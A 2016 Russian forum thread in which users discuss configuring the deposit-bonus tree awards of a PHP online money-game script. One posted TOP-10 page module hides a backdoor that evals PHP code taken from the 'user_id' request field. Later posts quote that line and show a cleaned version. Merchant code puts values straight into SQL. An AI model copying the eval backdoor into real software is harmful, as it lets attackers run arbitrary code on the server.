Автор Тема: SET Бонус  (Прочитано 4436 раз)

0 Пользователей и 1 Гость просматривают эту тему.

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« : 08 Июля 2016, 00:51:20 »
всем привет!
ребята подскажите где именно настраивается количество персонажей при пополнении суммы в сет бонусе.
все перекопал не могу найти и файл set смотрел и мерчант тоже.подскажите конкретно файл и после какой строчки.
 

radga14

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений За время в онлайне на форуме Более 10 созданных тем
  • Дата регистрации: Фев. 2016
  • Сообщений: 225
  • Страна: ru
  • Поблагодарили: 7 раз(а)
  • Репутация +1/-2
  • Пол: Мужской
SET Бонус
« Ответ #1 : 08 Июля 2016, 06:35:11 »
всем привет!
ребята подскажите где именно настраивается количество персонажей при пополнении суммы в сет бонусе.
все перекопал не могу найти и файл set смотрел и мерчант тоже.подскажите конкретно файл и после какой строчки.
_class.wmset.php вот тут
 

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #2 : 08 Июля 2016, 12:22:45 »
всем привет!
ребята подскажите где именно настраивается количество персонажей при пополнении суммы в сет бонусе.
все перекопал не могу найти и файл set смотрел и мерчант тоже.подскажите конкретно файл и после какой строчки.
_class.wmset.php вот тут
вот файл.можешь конкретно и подробно что здесь менять и как.
 

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #3 : 08 Июля 2016, 16:24:19 »
я смотрю не кто не знает.
как настроить.
 

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #4 : 09 Июля 2016, 23:25:56 »
всем привет!
ребята подскажите где именно настраивается количество персонажей при пополнении суммы в сет бонусе.
все перекопал не могу найти и файл set смотрел и мерчант тоже.подскажите конкретно файл и после какой строчки.
_class.wmset.php вот тут
ну и . дальше сам не знаешь. :alas:
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 2000 сообщений Топ 10 по сообщениям Топ 10 по созданным темам Репутация  более 25 Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Возраст: 32
  • Сообщений: 2028
  • Страна: ru
  • Поблагодарили: 242 раз(а)
  • Репутация +40/-1
  • Пол: Мужской
  • Дата рождения:
    1992-04-18
    Социальные сети:
    ВКонтакте
SET Бонус
« Ответ #5 : 10 Июля 2016, 06:34:57 »
и что ты хочешь настроить?

 

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #6 : 10 Июля 2016, 12:06:04 »
и что ты хочешь настроить?
хочу настроить количество деревьев поменять чуть меньше сделать,но не пойму как нашел такой модуль посмотрел инструкцию но там тоже об этом не сказано там только написано как менять стоимость деревьев,а мне надо количество.
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 2000 сообщений Топ 10 по сообщениям Топ 10 по созданным темам Репутация  более 25 Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Возраст: 32
  • Сообщений: 2028
  • Страна: ru
  • Поблагодарили: 242 раз(а)
  • Репутация +40/-1
  • Пол: Мужской
  • Дата рождения:
    1992-04-18
    Социальные сети:
    ВКонтакте
SET Бонус
« Ответ #7 : 10 Июля 2016, 15:44:23 »
блин ,ну тебе по любому придется ждать когда я освобожусь
 

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #8 : 10 Июля 2016, 15:54:19 »
блин ,ну тебе по любому придется ждать когда я освобожусь
ок. подожду!
 

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #9 : 16 Июля 2016, 02:28:59 »
блин ,ну тебе по любому придется ждать когда я освобожусь
походу я не дождусь помощи!
 

AlexGraur

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 33
  • Сообщений: 139
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:
    1991-03-11
SET Бонус
« Ответ #10 : 17 Июля 2016, 21:22:08 »
блин ,ну тебе по любому придется ждать когда я освобожусь
походу я не дождусь помощи!
настройка set бонуса находится по адресу /classes/_class.wmset.php
Заходите в файловый менеджер через ftp или с самого сайта. Затем идете в нужный директорий вашего сайта (например папка с названием вашего сайта, или html или еще как то папка называется) в ней имеется папка classes - открываем ее, ищем файл _class.wmset.php - открываем его и редактируе как вам надо цифрами по своему
   # Сет 1
      $this->sets[1]["min_sum"] = 100;
      $this->sets[1]["desc"] = "от 100 до 499 RUB";
      $this->sets[1]["t_a"] = 3;
      $this->sets[1]["t_b"] = 2;
      $this->sets[1]["t_c"] = 1;
      $this->sets[1]["t_d"] = 0;
      $this->sets[1]["t_e"] = 0;
      $this->sets[1]["t_f"] = 0;
Если сумма пополнения равна 100 и более то игрок получает растение номер 1 (t_a) в размере 3 шт, растение номер 2 (t_b) в размере 2 штук и растение номер 3 (t_c)в размере 1 штуки.. А все остальные 0. Это я указал для примера. Вы можете настроить по своему. Точно также идет по сумме пополнения от 500 и выше и т.д.
 
Пользователи, которые поблагодарили этот пост: dima2010

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #11 : 17 Июля 2016, 21:35:29 »
уменя файл другой немного
http://joxi.ru/Vm69jQMFqLwlrZ
http://joxi.ru/52avWkOcxpPOA0
видишь там у меня стоимость идет а ниже кофициент 0.7 и 0.317 когда их меняю сайт становится вопросиками.
 

AlexGraur

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 33
  • Сообщений: 139
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:
    1991-03-11
SET Бонус
« Ответ #12 : 17 Июля 2016, 21:52:41 »
кодировку поменяй когда меняешь)
И буковок с вопросиками не будет думаю
=================
Я понял это так http://joxi.ru/nAyw46HXEeoomZ
Возможно могу ошибаться, но вряд ли.. Хотя у тебя тут еще коэффициенты раставлены - с ними я малясь не понял..
Я понял это как если сумма выше пополнения выше 20 рублей, то плюсуем по 1 дереву, а также прибавляем еще 1 дерево или непонятно что когда умножаем на 0,317 и 0,7.. это надо видеть все самому конечно...
Расчеты в set бонусе есть - отдельная страничка, чтобы подставить сумму и вычислить что дадут - и тогда бы наверно более ли менее стало понятно как-то
 
Пользователи, которые поблагодарили этот пост: dima2010, maks161

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #13 : 17 Июля 2016, 22:13:35 »
спасибо! блин вот и я голову ломаю с этими настройками. сейчас стоит вот так допустим расчитать на 100р он дает дерево номер 1 
12шт и дерево номер 2 2шт.
а у тебя случайно нет такого сет бонуса как ты показал нормального. блин эти кофициенты голова ломается высчитывать как правильно это высчитать тяжело.
 

AlexGraur

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 33
  • Сообщений: 139
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:
    1991-03-11
SET Бонус
« Ответ #14 : 17 Июля 2016, 23:05:57 »
есть но прямо в скрипте))) выдирать не хочу - просто лень.... могу скрипт в лс сбросить если нужно и если выдеруть базу сможешь и сами файлы - то пожалуйста.. а вообще щас попробуем расчитать
 
Пользователи, которые поблагодарили этот пост: dima2010

AlexGraur

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 33
  • Сообщений: 139
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:
    1991-03-11
SET Бонус
« Ответ #15 : 17 Июля 2016, 23:12:47 »
100 умножаю на 0,7 получаю 70
а если расчитывать, что:
$sum = intval( ($sum + 1) * 0.317);
то получаем: (100+1) * 0.317 = 32.17
================================

умножаем 32,17 на 0,7 получаем 22... что это дает пока не понимаю к сожалению...  я запутался даже...
 
Пользователи, которые поблагодарили этот пост: dima2010

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #16 : 17 Июля 2016, 23:18:00 »
я вот тоже сидел пытался высчитать и тоже не понял как правильно это сделать.
по поводу скрипта если можешь скинь в личку. буду благодарен.
 

AlexGraur

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 33
  • Сообщений: 139
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:
    1991-03-11
SET Бонус
« Ответ #17 : 17 Июля 2016, 23:19:49 »
Вообщем файлы вот держи:
1. Это в classes
2. файл идет в /pages или /pages/account. где у тебя он находится - не знаю
3. В мерчанте вроде так - не знаю у тебя так или нет и все ли я скопировал по ним. Код ниже....
Базу я не нашел  - по ним видимо нет базы. Щас в яде посмотрю - но не знаю с дырой или нет там - я скачивал здесь в паблике, но там модули от ред чу идет - поэтому на редчу.ру я не надеюсь - я там не видел еще без дыр ничего


# WM сеты
   
   $wmset = new wmset();
   $marray = $wmset->GetSet($ik_payment_amount);
   
   $a_t = intval($marray["t_a"]);
   $b_t = intval($marray["t_b"]);
   $c_t = intval($marray["t_c"]);
   $d_t = intval($marray["t_d"]);
   $e_t = intval($marray["t_e"]);
   $f_t = intval($marray["t_f"]);
   
   $db->Query("UPDATE db_users_b SET a_t = a_t + '$a_t', b_t = b_t + '$b_t', c_t = c_t + '$c_t', d_t = d_t + '$d_t', e_t = e_t + '$e_t', f_t = f_t + '$f_t',
   last_sbor = '$lsb' WHERE id = '{$user_id}'");
 
Пользователи, которые поблагодарили этот пост: dima2010

AlexGraur

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 33
  • Сообщений: 139
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:
    1991-03-11
SET Бонус
« Ответ #18 : 17 Июля 2016, 23:25:58 »
И да учти у меня тут 6 деревьев прописано, а не 5(
Вообщем вот нашел у себя архив - держи.. Тут с 5 - разбирайся потихоньку и проверь на дыры - если умеешь.. Или кто то пусть тут проверит - кто понимает в этом)
 
Пользователи, которые поблагодарили этот пост: dima2010

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #19 : 17 Июля 2016, 23:32:42 »
И да учти у меня тут 6 деревьев прописано, а не 5(
Вообщем вот нашел у себя архив - держи.. Тут с 5 - разбирайся потихоньку и проверь на дыры - если умеешь.. Или кто то пусть тут проверит - кто понимает в этом)
спасибо! у меня такой же модуль как ты скинул с кофициентом. а дыры это не проблема я знаю как найти и убрать.
 

AlexGraur

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 33
  • Сообщений: 139
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:
    1991-03-11
SET Бонус
« Ответ #20 : 17 Июля 2016, 23:39:06 »
ну тогда вообще прекрасно)))) :laugh:
Если понимаешь, то найди плиз в этом модуле дыру:
<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

[br /]


<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

[br /]

<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>   
Это топ-10... Что-то мне подсказывает, что он с дырой(
 
Пользователи, которые поблагодарили этот пост: dima2010

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме За 1500 созданных тем более 4000 сообщений Репутация более 75 Топ 10 по созданным темам Топ 10 по сообщениям Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 44
  • Сообщений: 4887
  • Страна: ru
  • Поблагодарили: 1356 раз(а)
  • Репутация +92/-10
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:
    1979-06-30
SET Бонус
« Ответ #21 : 17 Июля 2016, 23:47:45 »
Насколько я знаю кажется вот она дырка

if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}

Вот код топа без дыры

<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

[br /]


<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

[br /]

<?PHP

 
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           

Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 
Пользователи, которые поблагодарили этот пост: dima2010, AlexGraur

maks161Автор темы

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
SET Бонус
« Ответ #22 : 17 Июля 2016, 23:55:51 »
вот твоя дыра . (get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']);die();}$db->Query("SELECT * FROM db_users_a,db_users
 
Пользователи, которые поблагодарили этот пост: dima2010, AlexGraur

AlexGraur

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 33
  • Сообщений: 139
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:
    1991-03-11
SET Бонус
« Ответ #23 : 17 Июля 2016, 23:59:13 »
вау круто!!!!! теперь буду знать.. не зря я подумал на этот модуль что именно тут дыра
 
Пользователи, которые поблагодарили этот пост: dima2010

AlexGraur

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 33
  • Сообщений: 139
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:
    1991-03-11
SET Бонус
« Ответ #24 : 17 Июля 2016, 23:59:53 »
в модуле этом имел ввиду.. еще раз спасибо... возьму себе на заметку все это)))
 
Пользователи, которые поблагодарили этот пост: dima2010
Теги: